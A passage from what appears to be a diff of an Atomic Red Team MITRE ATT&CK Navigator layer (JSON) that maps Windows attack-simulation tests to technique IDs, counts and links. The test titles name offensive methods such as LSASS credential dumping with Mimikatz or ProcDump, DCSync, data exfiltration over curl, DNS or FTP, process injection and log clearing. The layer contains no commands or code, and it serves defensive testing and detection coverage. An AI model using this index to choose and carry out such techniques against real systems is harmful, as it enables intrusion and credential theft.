Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator 
Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM 
Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with 
ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Network-Based Data Transfer in Small Chunks\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System 
Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands 
From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- 
Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ 
